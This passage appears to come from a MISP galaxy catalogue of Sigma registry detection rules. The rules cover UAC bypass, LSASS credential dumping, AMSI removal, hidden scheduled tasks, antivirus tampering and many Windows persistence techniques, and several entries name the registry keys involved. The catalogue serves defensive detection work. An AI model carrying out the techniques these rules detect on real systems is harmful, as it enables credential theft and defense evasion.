HybridConnectionManager Service Installation - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Stage Capabilities - T1608" with estimative-language:likelihood-probability="almost-certain"

Table 9309. Table References

Links

https://twitter.com/Cyb3rWard0g/status/1381642789369286662

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml

Esentutl Volume Shadow Copy Service Keys

Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured.

The tag is: misp-galaxy:sigma-rules="Esentutl Volume Shadow Copy Service Keys"

Esentutl Volume Shadow Copy Service Keys has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 9310. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml

Shell Open Registry Keys Manipulation

Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)

The tag is: misp-galaxy:sigma-rules="Shell Open Registry Keys Manipulation"

Shell Open Registry Keys Manipulation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Change Default File Association - T1546.001" with estimative-language:likelihood-probability="almost-certain"

Table 9311. Table References

Links

https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021][https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]]

https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/

https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml

FlowCloud Malware

Detects FlowCloud malware from threat group TA410.

The tag is: misp-galaxy:sigma-rules="FlowCloud Malware"

FlowCloud Malware has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9312. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_flowcloud.yml

Potential Credential Dumping Via LSASS SilentProcessExit Technique

Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process

The tag is: misp-galaxy:sigma-rules="Potential Credential Dumping Via LSASS SilentProcessExit Technique"

Potential Credential Dumping Via LSASS SilentProcessExit Technique has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9313. Table References

Links

https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/

https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml

Pandemic Registry Key

Detects Pandemic Windows Implant

The tag is: misp-galaxy:sigma-rules="Pandemic Registry Key"

Pandemic Registry Key has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 9314. Table References

Links

https://wikileaks.org/vault7/#Pandemic

https://twitter.com/MalwareJake/status/870349480356454401

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml

Terminal Server Client Connection History Cleared - Registry

Detects the deletion of registry keys containing the MSTSC connection history

The tag is: misp-galaxy:sigma-rules="Terminal Server Client Connection History Cleared - Registry"

Terminal Server Client Connection History Cleared - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9315. Table References

Links

https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html

http://woshub.com/how-to-clear-rdp-connections-history/

https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml

Removal Of SD Value to Hide Schedule Task - Registry

Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware

The tag is: misp-galaxy:sigma-rules="Removal Of SD Value to Hide Schedule Task - Registry"

Removal Of SD Value to Hide Schedule Task - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 9316. Table References

Links

https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml

Removal Of AMSI Provider Registry Keys

Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.

The tag is: misp-galaxy:sigma-rules="Removal Of AMSI Provider Registry Keys"

Removal Of AMSI Provider Registry Keys has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9317. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://seclists.org/fulldisclosure/2020/Mar/45

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml

Folder Removed From Exploit Guard ProtectedFolders List - Registry

Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder

The tag is: misp-galaxy:sigma-rules="Folder Removed From Exploit Guard ProtectedFolders List - Registry"

Folder Removed From Exploit Guard ProtectedFolders List - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9318. Table References

Links

https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml

Removal Of Index Value to Hide Schedule Task - Registry

Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query"

The tag is: misp-galaxy:sigma-rules="Removal Of Index Value to Hide Schedule Task - Registry"

Removal Of Index Value to Hide Schedule Task - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 9319. Table References

Links

https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml

Removal of Potential COM Hijacking Registry Keys

Detects any deletion of entries in ".*\shell\open\command" registry keys. These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.

The tag is: misp-galaxy:sigma-rules="Removal of Potential COM Hijacking Registry Keys"

Removal of Potential COM Hijacking Registry Keys has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9320. Table References

Links

https://github.com/OTRF/detection-hackathon-apt29/issues/7

https://docs.microsoft.com/en-us/windows/win32/shell/launch

https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code

https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand

https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml

Potential Ursnif Malware Activity - Registry

Detects registry keys related to Ursnif malware.

The tag is: misp-galaxy:sigma-rules="Potential Ursnif Malware Activity - Registry"

Potential Ursnif Malware Activity - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9321. Table References

Links

https://blog.yoroi.company/research/ursnif-long-live-the-steganography/

https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_malware_ursnif.yml

Potential COM Object Hijacking Via TreatAs Subkey - Registry

Detects COM object hijacking via TreatAs subkey

The tag is: misp-galaxy:sigma-rules="Potential COM Object Hijacking Via TreatAs Subkey - Registry"

Potential COM Object Hijacking Via TreatAs Subkey - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"

Table 9322. Table References

Links

https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_com_key_linking.yml

Potential Persistence Via Disk Cleanup Handler - Registry

Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence. The disk cleanup manager is part of the operating system. It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager’s UI. Although Windows comes with a number of disk cleanup handlers, they aren’t designed to handle files produced by other applications. Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Disk Cleanup Handler - Registry"

Table 9323. Table References

Links

https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/

https://persistence-info.github.io/Data/diskcleanuphandler.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml

PUA - Sysinternal Tool Execution - Registry

Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key

The tag is: misp-galaxy:sigma-rules="PUA - Sysinternal Tool Execution - Registry"

PUA - Sysinternal Tool Execution - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 9324. Table References

Links

https://twitter.com/Moti_B/status/1008587936735035392

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml

Suspicious Execution Of Renamed Sysinternals Tools - Registry

Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)

The tag is: misp-galaxy:sigma-rules="Suspicious Execution Of Renamed Sysinternals Tools - Registry"

Suspicious Execution Of Renamed Sysinternals Tools - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 9326. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml

Potential Persistence Via New AMSI Providers - Registry

Detects when an attacker registers a new AMSI provider in order to achieve persistence

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via New AMSI Providers - Registry"

Table 9327. Table References

Links

https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c

https://persistence-info.github.io/Data/amsi.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_amsi_providers.yml

Potential Persistence Via Logon Scripts - Registry

Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Logon Scripts - Registry"

Potential Persistence Via Logon Scripts - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001" with estimative-language:likelihood-probability="almost-certain"

Table 9328. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml

PUA - Sysinternals Tools Execution - Registry

Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key.

The tag is: misp-galaxy:sigma-rules="PUA - Sysinternals Tools Execution - Registry"

PUA - Sysinternals Tools Execution - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 9329. Table References

Links

https://twitter.com/Moti_B/status/1008587936735035392

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml

Potential Persistence Via Netsh Helper DLL - Registry

Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Netsh Helper DLL - Registry"

Potential Persistence Via Netsh Helper DLL - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1546.007" with estimative-language:likelihood-probability="almost-certain"

Table 9330. Table References

Links

https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/

https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml

New DNS ServerLevelPluginDll Installed

Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)

The tag is: misp-galaxy:sigma-rules="New DNS ServerLevelPluginDll Installed"

New DNS ServerLevelPluginDll Installed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9331. Table References

Links

https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html

https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml

Execution DLL of Choice Using WAB.EXE

This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.

The tag is: misp-galaxy:sigma-rules="Execution DLL of Choice Using WAB.EXE"

Execution DLL of Choice Using WAB.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9332. Table References

Links

https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml

http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/

https://twitter.com/Hexacorn/status/991447379864932352

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml

Tamper With Sophos AV Registry Keys

Detects tamper attempts to sophos av functionality via registry key modification

The tag is: misp-galaxy:sigma-rules="Tamper With Sophos AV Registry Keys"

Tamper With Sophos AV Registry Keys has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9333. Table References

Links

https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sophos_av_tamper.yml

Potential Persistence Via App Paths Default Property

Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence The entries found under App Paths are used primarily for the following purposes. First, to map an application’s executable file name to that file’s fully qualified path. Second, to prepend information to the PATH environment variable on a per-application, per-process basis.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via App Paths Default Property"

Potential Persistence Via App Paths Default Property has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1546.012" with estimative-language:likelihood-probability="almost-certain"

Table 9334. Table References

Links

https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/

https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml

Activate Suppression of Windows Security Center Notifications

Detect set Notification_Suppress to 1 to disable the Windows security center notification

The tag is: misp-galaxy:sigma-rules="Activate Suppression of Windows Security Center Notifications"

Activate Suppression of Windows Security Center Notifications has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9335. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_suppress_defender_notifications.yml

Potential Persistence Via CHM Helper DLL

Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via CHM Helper DLL"

Table 9336. Table References

Links

https://persistence-info.github.io/Data/htmlhelpauthor.html

https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_chm.yml

New ODBC Driver Registered

Detects the registration of a new ODBC driver.

The tag is: misp-galaxy:sigma-rules="New ODBC Driver Registered"

Table 9337. Table References

Links

https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_odbc_driver_registered.yml

Potential Persistence Using DebugPath

Detects potential persistence using Appx DebugPath

The tag is: misp-galaxy:sigma-rules="Potential Persistence Using DebugPath"

Potential Persistence Using DebugPath has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"

Table 9338. Table References

Links

https://github.com/rootm0s/WinPwnage

https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_appx_debugger.yml

Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG

Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".

The tag is: misp-galaxy:sigma-rules="Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG"

Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9339. Table References

Links

https://twitter.com/0gtweet/status/1674399582162153472

https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_provisioning_command_abuse.yml

CrashControl CrashDump Disabled

Detects disabling the CrashDump per registry (as used by HermeticWiper)

The tag is: misp-galaxy:sigma-rules="CrashControl CrashDump Disabled"

CrashControl CrashDump Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9340. Table References

Links

https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml

Outlook EnableUnsafeClientMailRules Setting Enabled - Registry

Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros

The tag is: misp-galaxy:sigma-rules="Outlook EnableUnsafeClientMailRules Setting Enabled - Registry"

Outlook EnableUnsafeClientMailRules Setting Enabled - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9341. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44

https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml

Disable UAC Using Registry

Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0

The tag is: misp-galaxy:sigma-rules="Disable UAC Using Registry"

Disable UAC Using Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9342. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-8---disable-uac-using-regexe

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_uac_registry.yml

Registry Explorer Policy Modification

Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)

The tag is: misp-galaxy:sigma-rules="Registry Explorer Policy Modification"

Registry Explorer Policy Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9343. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_set_nopolicies_user.yml

Potential Attachment Manager Settings Associations Tamper

Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)

The tag is: misp-galaxy:sigma-rules="Potential Attachment Manager Settings Associations Tamper"

Table 9345. Table References

Links

https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465

https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml

CurrentVersion NT Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="CurrentVersion NT Autorun Keys Modification"

CurrentVersion NT Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9346. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml

Scripted Diagnostics Turn Off Check Enabled - Registry

Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability

The tag is: misp-galaxy:sigma-rules="Scripted Diagnostics Turn Off Check Enabled - Registry"

Scripted Diagnostics Turn Off Check Enabled - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9348. Table References

Links

https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml

Potential Signing Bypass Via Windows Developer Features - Registry

Detects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.

The tag is: misp-galaxy:sigma-rules="Potential Signing Bypass Via Windows Developer Features - Registry"

Table 9349. Table References

Links

https://twitter.com/malmoeb/status/1560536653709598721

https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_turn_on_dev_features.yml

Session Manager Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="Session Manager Autorun Keys Modification"

Session Manager Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1546.009" with estimative-language:likelihood-probability="almost-certain"

Table 9350. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml

Add Debugger Entry To Hangs Key For Persistence

Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes

The tag is: misp-galaxy:sigma-rules="Add Debugger Entry To Hangs Key For Persistence"

Table 9351. Table References

Links

https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/

https://persistence-info.github.io/Data/wer_debugger.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml

Potential PowerShell Execution Policy Tampering

Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution

The tag is: misp-galaxy:sigma-rules="Potential PowerShell Execution Policy Tampering"

Table 9352. Table References

Links

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_execution_policy.yml

COM Hijack via Sdclt

Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'

The tag is: misp-galaxy:sigma-rules="COM Hijack via Sdclt"

COM Hijack via Sdclt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Event Triggered Execution - T1546" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 9353. Table References

Links

https://www.exploit-db.com/exploits/47696

http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml

Winlogon Notify Key Logon Persistence

Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.

The tag is: misp-galaxy:sigma-rules="Winlogon Notify Key Logon Persistence"

Winlogon Notify Key Logon Persistence has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"

Table 9354. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_notify_key.yml

Blackbyte Ransomware Registry

BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption

The tag is: misp-galaxy:sigma-rules="Blackbyte Ransomware Registry"

Blackbyte Ransomware Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9355. Table References

Links

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/

https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml

CobaltStrike Service Installations in Registry

